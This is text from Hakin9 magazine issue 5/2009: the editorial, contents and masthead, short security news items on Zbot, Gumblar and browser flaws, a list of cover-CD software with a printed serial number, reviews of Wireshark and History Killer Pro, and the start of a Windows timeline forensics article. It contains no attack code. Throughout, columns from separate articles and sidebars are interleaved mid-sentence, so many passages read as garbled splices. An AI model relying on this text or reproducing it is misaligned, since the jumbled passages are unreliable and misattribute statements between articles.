Discover what you can do ...
t is an amazing thing that when we start looking for new challenges or ideas, it turns out that they are really hard to find. It seems that they are hidden out of sight and I at times are really hard to perceive. I would imagine you have been in a situation where you wanted to – let’s say – hack some website or develop some new code; and your mind was blank, and you had no idea of how to do it. I think that happens to each and everyone of us, if not often then at least once.
I think that all of us want to avoid being stuck in such situations. We always want to have fresh and new ideas of how to overcome obstacles and find solutions to all our difficult and complicated tasks.
I think, the reason we reach this situation could be because of boredom, a repetitive routine or just the lack of inspiration coming from an external stimulus – something new and different. Sometimes, it seems that most techniques used are old and useless; but it is not true. New ideas exist and you need to be made aware of them to finally use them – constructively or creatively. We want to show you what has been perhaps hidden so far from you.
I hope that our magazine achieves in helping and supporting you with your daily tasks. We always aim at providing the most up to date issue by presenting modern hacking techniques often required and sought out by everyone in the respected areas.
In this issue our lead article on Hacking ASLR and Stack Canaries on Modern Linux (p. 20) looks at overcoming stack canaries on Linux systems which should prove to be quite appealing to the advocates of stack canaries in operating systems, as the author details a proof of concept that bypasses the protection mechanism.
On the other hand we have solutions related to computer forensics which can be discovered by reading the next two articles on page 12 entitled Windows Timeline Analysis written by Harlan Carvey, the first part of a three-part series, and on page 38 the article entitled My ERP Got Hacked by Ismael Valenzuela. The article by Valenzuela is the second part of his article presenting a practical explanation and hot tips on how to investigate and analyze the digital evidence found during the course of a computer forensics investigation. As we all know, computer forensics is a very interesting field and I think that you will enjoy the articles on this subject.
For all of you who want to hack at passwords and learn how to do so can read the article on brute-forcing passwords on page 46 (First Password Shooters written by Tam Hanna).
If you are a fan of Java and Javascript (not really Java) then you need to read the related articles. The first one is a really interesting article on how to hack JSONP mashup entitled Mashup Security written by Antonio Fanelli and the second one is RSA & AES in Java written by Michael Schratt. Staying up to date and secure with Web 2.0 and what drives it is always important on what the Internet has evolved to and the second article will be interesting for all of you who want to know more about the encryption and decryption of files and any issues you may come across.
In this Hakin9 issue you will find 8 articles. I think that this issue of the Hakin9 magazine will give you some good feedback and fresh ideas in various areas. Moreover, if you have any ideas for topics that you would like to see us cover in up coming issues, please let us know. So keep the mails coming in! Kind Regards Hakin9 team [email protected]. CONTENTS CONTENTS
team BASICS Editor in Chief: Ewa Dudzic [email protected] Executive Editor: Monika Świątek 12 Windows Timeline Analysis [email protected] HARLAN CARVEY Editorial Advisory Board: Matt Jonkman, Rebecca Timeline analysis has long been used in a number of disciplines in Wynn, Rishi Narang, Shyaam Sundhar, Terron Williams, Steve Lape, Peter Giannoulis, Aditya K Sood, Donald order to place a series of categorized events within an understandable, Iverson, Flemming Laugaard, Nick Baronian, Tyler Hudak progressive context. This can be very important and telling during computer DTP: Ireneusz Pogroszewski, Przemysław Banasiewicz, forensic examinations, as events can be ordered in time and be used to Art Director: Agnieszka Marchocka [email protected] illustrate a progression, or a cluster, of activity. Harlan shows you basic information about timeline analysis as well as the new information in order Cover’s graphic: Łukasz Pabian to update and advance the use of timeline analysis in computer forensic CD: Rafał Kwaśny [email protected] examinations.
Proofreaders: Konstantinos Xynos, Ed Werzyn, Neil Smith, Steve Lape, Michael Munt, Monroe Dowling, Kevin Mcdonald, John Hunter, Michael Paydo, Kosta Cipo, Lou 16 Analyzing Malware – Introduction to Rabom, James Broad Top Betatesters: Joshua Morin, Michele Orru, Clint Advanced Topics Garrison, Shon Robinson, Brandon Dixon, Justin Seitz, JASON CARPENTER Matthew Sabin, Stephen Argent, Aidan Carty, Rodrigo Rubira Branco, Jason Carpenter, Martin Jenco, Sanjay Bhalerao, Avi In the final part of this series in analyzing malware, Jason tells you a little Benchimol, Rishi Narang, Jim Halfpenny, Graham Hili, Daniel about more advanced topics such as polymorphic and metamorphic code, Bright, Conor Quigley, Francisco Jesús Gómez Rodríguez, Julián Estévez, Chris Gates, Chris Griffin, Alejandro Baena, as well as hiding in ADS. This will be a brief introduction to these topics to Michael Sconzo, Laszlo Acs, Benjamin Aboagye, Bob Folden, Cloud Strife, Marc-Andre Meloche, Robert White, familiarize you with them, so you can recognize them in the wild. At the end Sanjay Bhalerao, Sasha Hess, Kurt Skowronek, Bob Monroe, there will be references to get more information on these topics. Michael Holtman, Pete LeMay
Special Thanks to the Beta testers and Proofreaders who helped us with this issue. Without their assistance there would not be a Hakin9 magazine. ATTACK Senior Consultant/Publisher: Paweł Marciniak CEO: Ewa Łozowicka [email protected] Production Director: Andrzej Kuca 20 Hacking ASLR & Stack Canaries [email protected] Marketing Director: Ewa Dudzic on Modern Linux [email protected] STEPHEN SIMS Circulation Manager: Ilona Lepieszka [email protected] These methods have been privately known and publicly disclosed by Stephen and multiple other researchers over the years, but not in great Subscription: Email: [email protected] detail. The methodology attempts to demonstrate examples of modern
Publisher: Software Press Sp. z o.o. SK hacking techniques during conditional exploitation. In this article, Stephen 02-682 Warszawa, ul. Bokserska 1 will demonstrate methods used to hack stack canaries and Address Space Phone: 1 917 338 3631 www.hakin9.org/en Layout Randomization (ASLR) on modern Linux kernels running the PaX
Print: ArtDruk www.artdruk.com patch and newer versions of GCC.
Distributed in the USA by: Source Interlink Fulfillment Division, 27500 Riverview Centre Boulevard, Suite 400, Bonita Springs, FL 34134, Tel: 239-949-4450. 30 Mashup Security Distributed in Australia by: Gordon and Gotch, Australia ANTONIO FANELLI Pty Ltd., Level 2, 9 Roadborough Road, Locked Bag 527, NSW 2086 Sydney, Australia, Phone: + 61 2 9972 8800, Mashups will have a significant role in the future of Web 2.0, thanks to one of the most recent data interchange techniques: JSON. Antonio describes Whilst every effort has been made to ensure the high quality of the magazine, the editors make no warranty, express or JSON data interchange format and he also presents JSONP technique for implied, concerning the results of content usage. All trade marks presented in the magazine were used only mashups as well as shows you how to inject JavaScript with JSONP. for informative purposes. All rights to trade marks presented in the magazine are reserved by the companies which own them. 38 My ERP Got Hacked – An Introduction to To create graphs and diagrams we used program by Computer Forensics, Part II ISMAEL VALENZUELA Cover-mount CD’s were tested with AntiVirenKit by G DATA Software Sp. z o.o Part II of this article continues illustrating in practice the methods, The editors use automatic DTP system techniques and tools used to investigate and analyze the digital evidence Mathematical formulas created by Design Science MathType™ found during the course of a computer forensic investigation. You are finally ATTENTION! getting closer to know if there was any unauthorized access to the Web- Selling current or past issues of this magazine for prices that are different than printed on the cover is based Enterprise Resource Planning (ERP) server. Ismael, in his article, will – without permission of the publisher – harmful activity and will result in judicial liability. illustrate how to investigate security breaches and analyze data without DISCLAIMER! modifying it, how to create event timelines and how to recover data from The techniques described in our articles may only be used in private, local networks. The editors hold no unallocated space and how to extract evidence from the registry and how responsibility for misuse of the presented techniques or consequent data loss. to parse windows event logs.
4 HAKIN9 5/2009 CONTENTS CONTENTS 46 First Password Shooters TAM HANNA The core difference between Central Processing Units (CPU’s) and REGULARS Graphics Processing Unit (GPU’s) is in the name: while the first is a CENTRAL processing unit, the latter ones go by the nickname GRAPHICAL 06 In brief processing unit. Many graphical tasks can be parallelized well and consist Selection of short articles from the IT of simple operations; all current architectures are designed for performing security world. hundreds of very simple tasks at the same time rather than having one or Armando Romeo & two cores which can do everything reasonably well. Tam shows you how to www.hackerscenter.com crack passwords for fun and profit. ID Theft Protect
08 ON THE CD DEFENSE What's new on the latest hakin9.live CD. hakin9 team 52 RSA & AES in JAVA MICHAEL SCHRATT 10 Tools Cryptography is used for hiding information. The term cryptography Wireshark itself represents several algorithms like Symmetric-key cryptography, Mike Shaffer Asymmetric-key cryptography (also called Public-key cryptography), but History Killer Pro 3.2.1 also Cryptosystems and Cryptanalysis. Today, Michael introduces to you Michael Munt cryptographic functions written in JAVA, specifically RSA & AES. For those of you who do not know RSA and AES, he covered some of the better 64 ID fraud expert says... descriptions in the link section at the end of the article. The Underworld of CVV Dumping, Carding and the Effects on Individuals 58 AV Scanner 101 and Business and Ways to Prevent it RYAN HICKS Julian Evans Over the past two decades antivirus technology has evolved considerably. The changing nature of threats has driven research and development in order to combat the flood of new malware. While there are different 70 Training Review approaches to scanning technology, certainly different vendors make VTE Training distinct architectural and implementation decisions, there are certain James Broad commonalities that are present in most modern antivirus scanners. Ryan gives you an overview of the history of scanning technology, a description of 72 Emerging Threats the most common techniques, and illustrate potential future developments. It's All About Reputation Matthew Jonkman
74 Interview An interview with Andrey Belenko Ewa Dudzic
76 Interview An interview with Ilya Rabinovich Ewa Dudzic
78 Interview An interview with Alexandre Dulaunoy & Fred Arbogast Ewa Dudzic
82 Upcoming Topics that will be brought up in the upcoming issue of Hakin9 Code Listings Ewa Dudzic As it might be hard for you to use the code listings printed in the magazine, we decided to make your work with Hakin9 much easier. We place the complex code listings from the articles on the Hakin9 website (http://www.hakin9.org/en).
5/2009 HAKIN9 5 IN BRIEF IN BRIEF
started circulating since the very early BROWSE AND GET OWNED GOOGLE STILL FIXING CHROME hours following the sad news. – DIRECTSHOW VULNERABILITY A year has gone since the release of Michael.Jackson.videos.scr and other A remote code execution vulnerability in Google Chrome. You all remember the similar infected media files are actually the way Microsoft DirectShow handles unlucky beta release that counted million trojan horses, downloaders, adwares and supported QuickTime format files has downloads within few days as well as 3 similar spyware software. been utilized by hackers to perform a remote code execution vulnerabilities at Fake websites have appeared, inducing dangerous, although small-scale, browse the same time. visitors to enter their personal information in and get owned attack. Google Chrome, now a mature order to get the albums from the singer. The attacker could construct a software, with the fastest Javascript engine Although Youtube and Google have malicious webpage which uses the available, still enjoys the attention of security taken their countermeasures to mitigate media playback plug-ins to playback researchers who happen to find buffer the propagation of such activities, one a malicious QuickTime file to reach overflows that more often than not lead to can guess that spammers are having the vulnerability in quartz.dll. This type remote code execution exploits in the wild. good success rates in their campaigns. of attack is browser independent as it The latest, already patched, involves Law of large numbers, strong feelings and address a plugin that any browser could a severe flaw in how the browser handles impulsive call to actions are the keys to use. crafted responses from HTTP web success for these unscropolous people. The malformed media files, servers. according to Microsoft Security A cumulative patch has been Response Center, were responsible released in the Summer to fix two other KEVIN MITNICK SITE DEFACED, for the download of trojan horses issues affecting Webkit application AGAIN collecting victim's information and framework. Good old Kevin, is the hackers number redirecting it to hackers controlled A statistic published on Microsoft one target. For his fame and for the press servers. PressPass, based on a survey of 2,385 that a successful hacking attack to his The vulnerability doesn't affect U.S. adults Internet users, demonstrated site undobiuosly brings everytime. This Windows 2008 nor Windows Vista, where that 62 percent of interviewed are more time Kevin is not to blame though. The the quartz.dll, DirectShow library, has likely to choose a browser with a high attack was just another DNS Redirect been removed. level of security built in and some ability to attack occurred on one of his website customize security and privacy settings. Hosting premises. Hostedhere DNS The question here is: Are they aware cluster was indeed compromised (again) FTP LOGIN DATA of browser built-in vulnerabilites when and the records for kevinmitnick.com and TARGETED BY TROJANS choosing Internet browser? mitnicksecurity.com were rewritten to point Jacques Erasmus, CTO at Prevx, an to hackers controlled servers. Servers internet security vendor headquartered in hosting the defacement page, with the U.K., discovered a site where a trojan SPAMMERS EXPLOITING DEATH pornograpic pictures, in which the main is uploading FTP login credentials from OF JACKO character was Kevin himself. more than 74,000 websites. Death of King of Pop left millions of Not nice. Kevin has therefore Among the affected FTP login data fans in tears. Televisions and radios are decided to part from Hostedhere to find are major corporations including Bank of transmitting Michael Jackson albums a more security-aware hosting service America, BBC, Amazon, Symantec and non-stop and Youtube has been flooded capable of facing the threat of having McAfee. by millions of visitors willing to watch his such a prominent target for the hacker The trojan, a variant of Zbot, main legendary videos. So why not exploit community. Who wants to host Kevin now? purpose is to harvest stored FTP login people feelings to mount a large scale credentials to send them to servers spamming campaign to tap Internet located in China. users into opening phishing emails? BRITAIN HIRING HACKERS TO According to Erasmus, the final 750 million albums sold is a big number FIGHT CYBERCRIME purpose of this attack is to get access and spammers know the law of large UK minister of Home Security, Lord to websites source codes injecting evil numbers better than anyone else. West, has attracted the criticisms Iframe that would spread the malware The plot theories, very common when of the security community after the further. talking about legends, have helped a lot announcement of recruting former The Zbot trojan has been in use for as well. hackers to fight cybercrime in the new some time to carry on different types of Emails claiming to bring to Cyber Security Operations Centre. illegal and also remunerative activities: confidential information regarding the You need youngsters who are deep installing spyware and adwares and death of Michael Jackson or to the into this stuff… If they have been slightly phishing emails mainly. download of unreleased albums have naughty boys, very often they really
6 HAKIN9 5/2009 5/2009 HAKIN9 7 IN BRIEF IN BRIEF
enjoy stopping other naughty boys, he by-downloading the malicious malware to The simple solution here is for said. Not an original idea anyway. users PC’s. Windows Explorer to show the full The problem with all this is that, as he In response to this threat, Google has extension. We are sure Microsoft will fix stated, they avoided to employ ultra, ultra begun de-listing servers that had been this vulnerability in the next release. criminals. While so called elite hackers infected with the script. However the hackers are the ones who do not get caught, were very smart and responded by issuing Source: ID Theft Protect the choice of giving such a prominent a more complex, sophisticated script job to script kiddies instead of security that was obfuscated to avoid detection. professionals fighting cybercrime in the The script pointed to the gumblar.cn FAKE URLS LEAD TO MALWARE trenches since years, has raised a wave domain, which delivers malware that takes Recent research from a leading security of arguments and controversies. advantages of unpatched Adobe PDF company suggests that criminals are Reader (see below) and Flash application. using search engines as a method of ID Theft Protect suggests you disable adding infected URLs in popular websites HIGH SCHOOL PROGRAMMING JavaScript in Adobe PDF Reader. This will such as Facebook, MySpace and Twitter. LEAGUE – NEXT EDITION not affect opening and closing of PDF These fake URLs (domains) are in no The High School Programming League documents. way connected to these popular websites. contest is intended for students of Here is how you disable JavaScript In fact they attempt to trick users into high schools (or schools educating on Adobe PDF Reader: for example entering usernames and at a similar or lower level). We have passwords or try to download malicious carefully prepared a problem set to suit • Launch Acrobat or Adobe Reader. software onto your PC. participants at all skill levels, including • Select Edit>Preferences The most common fake website beginners. If you are familiar with • Select the JavaScript Category is Facebook, Surprise, surprise! Over online judge systems like SPOJ http:// • Uncheck the Enable Acrobat 200,000 fake Facebook URLs have been www.spoj.pl, you will have a general idea JavaScript option found when doing a search in Google. of the sort of problems to expect, but • Click OK This isn’t a new problem. However, it is there will also be a few nice surprises. a growing problem for those that do not Each problem set is slightly different. Source: ID Theft Protect understand that a link in Google may not We recommend C++ or Java. There are be legitimate. also other available languages, such as PHP, Perl, Python, Ruby, Pascal, and WINDOWS 7 EXTENSION FILE Source: ID Theft Protect others. The complete list of languages SECURITY ISSUE IDENTIFIED and compilers is available when Windows 7 Release Candidate (RC) looks submitting http://hs.spoj.pl/submit/ a like it will continue Microsoft’s trend of HACKER HALTED USA solution. putting users at risk. CONFERENCE http://hs.spoj.pl/embed/info/ The Windows 7 operating system’s Hacker Halted USA Conference to Offer Windows Explorer file manager appears Complimentary Security Training worth to mislead users about the true extension $599 to All Delegates Unique opportunity GUMBLAR AND JSREDIR-R of a file. It doesn’t show the full extension for attendees of information security INSTALLS MALWARE ON A PC for a filename and hides the extension conference in Miami to attend specially The latest malicious malware circulating file type. This flaw would allow hackers designed one-day training workshops in the wild is now so clever it is altering to establish malware by using those file covering some of the most popular Google searches. Gumblar and JSRedir- types’ extensions and icons. security topics. Attendees of Hacker Halted R installs malware on a PC and locally Windows Explorer, for example, will USA 2009, a world-class information modifies Google search results, replacing show the .txt icon and display 'attack.txt' security conference to be hosted in Miami, legitimate results with links to affiliates’ as the filename for a Trojan horse that's Florida, from September 23 – 25, will be pages. actually been named attack.txt.exe by the entitled to attend one of three security This is similar to rogueware (fake hacker. The practice goes back to at least workshops led by EC-Council Master anti-virus software) which modified some Windows NT, and has been criticised Instructors. These one-day workshops will search results (i.e. if you searched for anti- in the still-popular Windows XP and the cover three of the most popular security virus and clicked on the link to say AVG it newer Windows Vista. topics, namely Identifying Threats and would redirect you to a fake AVG page). Users normally look at an icon to Deploying Countermeasures; Principles Security experts have identified that determine the file type, so you can see of Incident Handling; and Exposing the delivery platform originates from a why this is a flaw. Not being able to see Virtualization Security Threats. Latvian IP address. A script was installed the full extension will increase the chances on hacked legitimate websites for drive- of malicious files executing on a PC. http://www.hackerhalted.com
6 HAKIN9 5/2009 5/2009 HAKIN9 7 HAKIN9.LIVE ON THE CD
BackTrack is the most top rated Linux live distribution focused on penetration testing. With no installation, whatsoever, the analysis platform is started directly from the CD-Rom and is fully accessible within minutes.
s always we provide you with SBMAV DISK CLEANER of the batch component of our product commercial applications. You will Advanced hard disk cleaner for Windows PyroTrans, which can be installed and A find the following programs in Apps that can safely clean your disk! It is run independent from the PyroTrans directory on the Hakin9 CD. designed to clean a hard drive of various packet. (PyroTrans is a file transfer packet informational trash having no importance, consisting client/server/batch for file ACROBAT KEY which simply clutters the disks. transfer over phone lines and network/ Acrobat Key (Passware Kit Standard A powerful tool for cleaning cobwebs internet). module) instantly removes restrictions of useless information clogging your PyroBatchFTP allows users and on copying, printing and other actions for system and reducing its performance, software developers to perform PDF files. It also recovers document open SBMAV Disk Cleaner searches for automated file transfers. This is done by passwords. Features: and deletes temporary files and writing scripts for PyroBatchFTP, which folders created by Windows and other will transmit files to and from other • All versions through Adobe Acrobat applications, as well as searches for computers which run a standard ftp 9.0 are supported. invalid links to documents that have long server. • Recovers user password required to since been deleted. SBMAV Disk Cleaner PyroBatchFTP features a script open the file. also finds useless uninstall software, language, DDE interface and logging • Decrypts PDF files protected with deletes cookies, and searches for and functions, which allow other software to owner passwords. removes duplicate files. determine the success and flow of each • Instantly removes restrictions on SBMAV Disk Cleaner 2009 is a of the script commands. copying, printing and other actions one-stop suite with over 6 tools to do with the file. a thorough cleanup. In just one click, PyroBatchFTP Features • Fast password recovery engine for you can find and remove the clogging Acrobat 9.0 files - up to 1,300,000 junk out of Windows and applications, • Automated scripting support for passwords checked per second on a uninstall unnecessary programs, remove access to internet FTP servers P-IV system. duplicate files, delete cookies, disable • Support for SSH based SFTP • To recover user passwords, 8 different auto-loaders that slow down system servers with username/password attack types (and any combination of startup and much more. The tools are authentification them) could be set up using a wizard delivered in a nice-looking interface, • Transmission of whole directory trees or drag & drop attacks editor. which requires no learning as it’s totally • Synchronisation of directories and • Supports password modifications, intuitive for beginners. directory trees including case changes, reversed • Built in cron-like scheduler words, etc. • Installation: Unzip and run the • Can be run as a Window NT4/XP/ • Program automatically saves program setup.exe. Follow its 2000 service password search state and can instructions. • Retry operation for failed commands resume after a stop or a crash. • System Requirement: Windows95/98/ • Interface to execute FTP commands • Combines attacks for passwords like NT/2000/ME/XP/Vista from VB or C++ applications strong123password. • Automatic logging • All recovered passwords are saved Price: $14.99 • Runs on Windows 9x/ME/NT4/2000/ and ready to be reused on other files. http://www.sbmav.com/ 2003/2008/XP/Vista • Uninstall program Serial number: WLVXK-XSFAL-MZASY- PYROBATCHFTP 2.22 D3FMC-XZGB3H PyroBatchFTP is a FTP (Internet File Price: $39.00 Transfer Protocol) and SFTP (SSH secure Price: $39.00 http://www.lostpassword.com/acrobat.htm file transfer protocol) enabled version http://www.sbmav.com/
8 HAKIN9 5/2009 IF THE CD CONTENTS CAN’T BE ACCESSED AND THE DISC ISN’T PHYSICALLY DAMAGED, TRY TO RUN IT ON AT LEAST TWO CD DRIVES. IF YOU HAVE EXPERIENCED ANY PROBLEMS WITH THE CD, E-MAIL: [email protected] TOOLS TOOLS Wireshark
As an essential element of the and show the results in the packet list pane that toolkit of any network professional, is part of the main window. On a busy network Wireshark provides the tools to this will quickly fill with all the network noise capture and analyze network traffic including routing protocols, spanning-tree from or to perform analysis on network captures switches and arp requests. Somewhere amidst provided by tools such as tcpdump, tshark, the turmoil are the packets you're looking for. EtherPeak and a wide range of others. Wireshark thoughtfully provides two primary Quick Start. As an independent IT methods to save filling your hard drive and consultant to small businesses and similar drawing down your patience in analyzing all organizations I've been using Wireshark and that network noise. On the front end the analyst it's fore-runner Ethereal since around 2001 and can deploy capture filters that as the name consider it the most important tool in my kit for would imply limit what packets Wireshark resolving networking issues. actually brings up from the NIC and includes A simple example is a government customer in the capture archive. If for example you know with a staff of about 12 on a small LAN had you have no interest in all that chatty spanning- a new big-brand-name combination copier, tree traffic between switches you can deploy printer and scanner installed. The day after the a capture filter to tell Wireshark to ignore those installation the manager sends me an email packets. This provides several benefits in that saying that when I had a chance to check out your capture data set will be reduced making the network as it was definitely acting just a tad analysis much quicker and efficient and the more sluggish. A 60 second capture set with saved captures will make for smaller files. System: Multi-Platform: Wireshark showed that the network was not Even with a good set of capture filters in place Windows, Linux, BSD, only busily handling its normal load of TCP/IP a busy network will generate a lot of packets Solaris... traffic but was awash in both AppleTalk and IPX/ so how do we, as network analysts, save our License: GNU General SPX. Seeing how we had neither any Macs or patience and find specific packets or groups of Public License Netware servers on the network inquiring minds packets. Enter the second powerful feature; that Purpose: Network wanted to know the source of this bothersome of using display filters. Whereas capture filters Protocol Analyzer gibberish. A quick analysis of the packets actually limit what packet types will be included Homepage: revealed the offending traffic all originating in the capture set, the display filter only controls www.wireshark.org from the IP assigned to the new multifunction what is shown in the packet list pane. The actual machine. A short walk through the network capture set isn't altered and remains intact. For settings dialog screens for the multifunction example let's say that in my haste I didn't filter out box showed that the tech had simply left the the spanning-tree traffic and now my 15 minute defaults on which where to use IPv4, AppleTalk capture set has some critical packets all of which and IPX/SPX. Two quick taps to disable the latter are somewhere in that sea of STP dribbling down two and Wireshark showed the network no the page causing my vision to blur. Relief is as longer bothered by unnecessary traffic and the close as typing !(stp) in the Filter: box and clicking performance slightly improved. apply. The packet list pane will now show all traffic After installing Wireshark you're ready to that was captured except for spanning-tree. do your first packet captures. So let's go. The Useful Features. Wireshark provides an easiest method is to use the main toolbar excellent set of tools to analyze the packet (the set of icons directly below the text menu capture set the discussion of which is too headings) and left-click on the left-most icon that lengthy for an introductory article. I would note looks like NIC with a small white list box on it. that it's well worth the efforts to spend some This will open the Capture interfaces dialog box time working through the options provided as which will show the interfaces that Wireshark is a wealth of information can be drawn from recognizing, a description, the IP, and a column the capture set that can be instrumental in showing packet activity for each. To begin resolving a myriad of network issues including capturing packets just left-click on the start performance and security. button for the interface you want. Wireshark will now begin capturing packets for that interface by Mike Shaffer
10 HAKIN9 5/2009 5/2009 HAKIN9 11 TOOLS TOOLS History Killer Pro 3.2.1
History Killer Pro is being marketed Once you start to use the program it as a complete professional solution becomes apparent that a lot of thought has gone for many privacy issues. It has the into trying to remove all the entries that a user following features: Search function – users are leaves behind every time they use a computer. able to search after a scan of their PC and The targets (that’s what History Killer Pro selectively remove data for particular items, like calls the entries that need removing) are a certain website for example; locked Index.dat grouped under relevant sectional headings. parsing – users are able to make necessary changes in it without reboot; file system • Windows System recognition of Recycle Bin – you are able to • Internet Explorer browse your Recycle Bin including folders and • Firefox sub-folders, files, size, type, date modified and • Windows Accessories selectively pick which you would like deleted • Microsoft Office Common Files permanently; selective removal of items and • Microsoft Office 2007 sub-items – all items scanned via the program • Microsoft Office 2003 are wholly visible and can be deleted selectively (folders, sub-folders, files, etc). By clicking on each of these headings it will Quick Start. This was very straight forward reveal further details of what will actually be and easy to install with a single exe file, but scanned. It is very granular, allowing the user to bizarrely it isn’t installed to the usual c:\ pick and choose what they wish to be removed program files location on my machine instead from each category. System: CPU 300 Mhz or it defaulted to C:\Documents and Settings\ This product isn’t clever enough to realise higher, RAM 128 MB, HDD username\Application Data\. what programs you don’t actually have installed 5 MB, OS Windows Vista, The front main screen is crisp, clean, sensibly and it will allow you to pick both Microsoft Office XP Internet Explorer 6.0 or laid out and very easy to read. From the outset it versions if you wish to do so. As it goes through higher was apparent that this wasn’t a tool for the usual a scan, you see it working through each option Lifetime licence $49.95 home user, it was definitely aimed at the more that you have selected with the results listed Developed by: Emergency technically savvy user. This observation was due underneath each of them. You can then click on Soft to the fact there was no apparent help file or each of the settings to see in complete detail Homepage: http://www.hi directions on how to actually use the program. what has been found (Figure 1). You are then able storykillerpro.com/ I had to go find the help file myself that was to manually remove entries that have been found located in the programs installation directory. if you feel that you need to have them. (Not that I read it though). On the program’s Once you have everything selected to your website, there are 5 basic tutorials on how to use satisfaction, you can either choose to Kill from the program; it would have been good to have each section one at a time, or you can select a link to these from the program itself, instead of the Kill Targets button from the main screen. forcing the user to go find them on their own. That’s it, those entries are gone. Useful Features. Overall I am impressed with History Killer Pro, with its layout, and ability to be totally selective in what I remove from my machine. I do have one major gripe though, when trying to setup exclusions from the list, it is not very clear on how detailed you need to be for the exclusion to work, or what you could actually exclude. This product has the makings of being able to take on the well established similar products in the market, and I look forward to seeing how it progresses.
by Michael Munt Figure 1. History Killer Pro
10 HAKIN9 5/2009 5/2009 HAKIN9 11 BASICS HARLAN CARVEY Windows Timeline Analysis Difficulty The increase in sophistication of the Microsoft (MS) Windows family of operating systems (Windows 2000, XP, 2003, Vista, 2008, and Windows 7) as well as that of cybercrime has long required a corresponding increase or upgrade in incident response and computer forensic analysis techniques.
he traditional forensic timeline analysis a means for extracting file system metadata and approach of extracting file modified, last consolidating a timeline of file system activity, T accessed, and creation times is proving while Rob Lee’s mac-daddy tool provides a simple to be increasingly insufficient for the analysis means of sorting and visualizing the data. Michael task at hand, particularly as other sources Cloppert’s work on ex-tip includes other sources (files on a Windows system, logs from network of time stamped information from within an image devices and packet captures, etc.) provide acquired from a Windows system, to include the a wealth of information for generating more Registry hive files and antivirus (AV) application complete timeline of activity. In addition, versions logs. However, there is much more data available of the operating systems beyond Windows for timeline analysis from within an acquired 2003, as well as some MS applications (http: image that will provide a vastly greater level of //support.microsoft.com/kb/961181) are no context and detail to the analyst. In addition, longer recording file last accessed times by multiple sources of data (network traffic captures, default, forcing analysts to seek other avenues to firewall and network device logs, multiple system determine if a user accessed a file. images, etc.) can be incorporated into an overall timeline, providing a much more granular level of Introduction detail for analysis, visualization and reporting. Timeline analysis has long been used in a number of disciplines in order to place a series Advancing Timeline Analysis of categorized events within an understandable, The basic idea behind timeline analysis is to take WHAT YOU SHOULD KNOW... progressive context. This can be very a series of events that occurred at specific times, important and telling during computer forensic then sort and display them based on the event Basic information regarding computer forensic examinations examinations, as events can be ordered in time time stamps. Techniques for timeline generation
Basic information regarding file and be used to illustrate a progression, or a utilizing only file system metadata, or incorporating metadata (i.e., MAC times) cluster of activity. Generating timelines based on only Registry key LastWrite times (which are WHAT YOU WILL file system metadata (file and directory modified, analogous to file last modified times) into the LEARN... last accessed, and creation, or MAC times) has timeline provide a limited view of overall system long been a traditional means of data reduction (and user) activity, particularly given the shear Basic information about timeline analysis and forensic analysis, largely due to a general amount of time stamped information available
New information in order to understanding of what must occur in order to to the analyst from nothing more than a single update and advance the use of cause this data to be created or modified. Brian acquired image. For example, Windows 2000, timeline analysis in computer forensic examinations Carrier’s TSK (i.e., The SleuthKit) tools provide XP, and 2003 systems maintain Event Logs in a
12 HAKIN9 5/2009 WINDOWS TIMELINE ANALYSIS
proprietary binary format (Event Logs for Generating timelines does not require a consistent manner. Descriptions of some Windows Vista systems and higher are significant amount of data within an event events can be derived directly from the maintained in an XML format), and each structure beyond the time stamp. Following source data itself, as is the case with event includes times for when the event the time stamp for the event, there are Windows Event Logs and IIS web server itself was generated, as well as when it ideally four additional fields that comprise logs. For other events, some consistent was actually written. Further, while Registry an event structure that are pertinent to descriptive information may need to be keys maintain LastWrite times (Registry generating a succinct yet comprehensive added to this field in order to make the values do not maintain similar information), and understandable timeline. The first is information understandable or provide additional time stamped data can be the source of the event; event sources context. extracted from a range of Registry value can range from the file system to the data entries (i.e., UserAssist keys, etc.). In Registry to the Event Log, and will be more Sources addition, there is a significant amount of completely addressed in the Sources As previously discussed, there are a context that is available and can be used section found later in this article. number of sources of time stamped to provide a deeper understanding of the Next, an event should identify information from systems, which can incident by incorporating multiple data the system on which the event was obtained from live systems as well as points from within a system. Data points generated or from which it was derived, from acquired images. Time stamped such as most recently used (MRU) lists as events can be correlated across information associated with the system and an understanding of how these data multiple systems. Systems can be can be retrieved from the System, points or events are created or modified identified by IP or MAC address, NetBIOS Software, Security and SAM Registry will provide context and intelligence as or DNS name, depending upon the hive files, as well as from the Event to the data that makes up the generated source of the data comprising the event, Logs and application Prefetch (for timeline. which may require the use of a key or Windows XP and Vista systems) files. legend with which all identifiers can be Additional information can be extracted Fields of an Event normalized. As data for events can be from application (antivirus, Dr. Watson, The key element to generating a timeline derived from Windows or Linux hosts, etc.) logs, the Scheduled Task log file, is the time stamps associated with the firewalls, network devices, IPSs, etc., and Malicious Software Removal Tool various events. On Windows systems, the type of system should be implicitly (a.k.a., MRT, more information found many time stamps are maintained as associated with the system name, or at http://support.microsoft.com/kb/ 64-bit FILETIME objects, defined as 100 added to the legend. 891716) logs, as well. Information nanosecond increments since 1 Jan The fourth field of an event structure associated with specific users can be 1601. In other instances, time stamps are is the user to which the event pertains, if extracted from Recycle Bin INFO2 files, maintained as 32-bit values, indicating such information is available or pertinent. NTUSER.DAT Registry hive files, and the number of seconds since 1 Jan 1970, For system-wide events, this field can be web browser history files (via tools such which is analogous to the Unix epoch left blank or filled in with the name of the as FoundStone’s pasco or Mandiant’s time. For the purposes of normalizing system itself. As with the system name WebHistorian). the values and maintaining a consistent field, users can be identified through relationship between events, all times a variety of means (i.e., username, XP Restore Points and Vista should be normalized and maintained SID, domain\username combination, Volume Shadow Copies as 32-bit values; 64-bit values can be email address, chat screen name, etc.), Information can also be retrieved from easily translated to 32-bit values where necessitating the need for a key or legend. Windows XP System Restore Points, necessary, with no significant loss in Finally, each event structure requires not only from the rp.log file itself (the granularity. a concise description of the event itself, date and reason for the Restore Point identifying the event in a clear and being created), but also from Registry Five Fields of an Event
• Time stamp, normalized to a 32-bit Timeline Example During an examination, an analyst generated a timeline of activity from an acquired system Unix epoch time image, incorporating file system metadata derived using the TSK tool fls, and Event Log data • Source – from where within the extracted using a custom Perl script. Using a process name listed in a memory dump as the system the data was derived basis for a search, the analyst was able to develop a comprehensive timeline of malicious • System – the system or host from activity stretching back almost 6 months prior to the date that the image was acquired, which the data was derived illustrating repeated compromises of the system. Data from AV logs showed that following • User – the user associated with the the initial infection, malicious files were deleted by the AV application; however, subsequent infections did not result in the files being detected and deleted. Timeline analysis was able to event provide a window of intrusion, as well as the necessary information for conducting targeted • Description – a concise description searches within the acquired image for additional data. of the event
